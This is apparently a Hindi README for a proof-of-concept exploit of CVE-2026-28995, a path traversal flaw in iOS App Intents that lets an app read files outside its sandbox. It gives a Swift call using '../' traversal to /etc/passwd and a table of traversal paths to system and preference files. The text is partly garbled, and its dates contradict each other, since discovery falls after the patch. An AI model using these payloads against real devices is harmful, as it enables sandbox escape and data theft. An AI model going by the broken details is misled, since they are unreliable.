
# CVE-2026-28995 CVE-2026-28995 के लिए प्रूफ ऑफ कॉन्सेप्ट — iOS 26.4.2 और उससे नीचे के App Intents में पाथ ट्रैवर्सल भेद्यता।
CVE-2026-28995 के लिए प्रूफ ऑफ कॉन्सेप्ट — iOS 26.4.2 और उससे नीचे के App Intents में पथ ट्रैवर्सल भेद्यता।
यह भेद्यता एक दुर्भावनापूर्ण ऐप को App Intents के माध्यम से अपने सैंडबॉक्स के बाहर किसी भी फ़ाइल को पढ़ने की अनुमति देती है। इसका मूल कारण Apple के App Intents फ्रेमवर्क में अपर्याप्त पथ सत्यापन है।
प्रभावित संस्करण: iOS 26.4.2 और उससे नीचे
पैच किया गया: iOS 26.5 (11 मई, 2026)
readCve(path: String) -> Stringlet intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
| पथ | पढ़ता है |
|---|---|
../../../../../../../../../../../../../etc/passwd | उपयोगकर्ता पासवर्ड |
../../../../../../../../../../../../../etc/hosts | होस्ट फ़ाइल |
../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist | सिस्टम प्राथमिकताएँ |
यदि पथ किसी निर्देशिका की ओर इशारा करता है, तो फ़ंक्शन लौटाता है:
[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/
CVE-2026-28995.swift जोड़ें।readCve(path:) को कॉल करें।खोजा गया: 1 जुलाई, 2026
पैच किया गया: iOS 26.5 (11 मई, 2026)